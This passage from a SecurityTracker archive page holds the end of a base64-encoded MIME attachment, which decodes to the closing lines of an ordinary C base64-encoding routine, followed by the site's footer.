ICAvKiBUaGVyZSB3YXMgb25seSAxIGJ5dGUgaW4gdGhhdCBsYXN0IGdyb3Vw
ICovDQogICAgICAgIG91dHB0clstMV0gPSAnPSc7DQogICAgICAgIG91dHB0
clstMl0gPSAnPSc7DQogICAgfQ0KICAgICpvdXRwdHIgPSAnXDAnOw0KICAg
IHJldHVybiAob3V0cHRyIC0gYnVmY29kZWQpOw0KfQ0KDQoNCg0K
--8323328-1986516652-999797980=:868--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC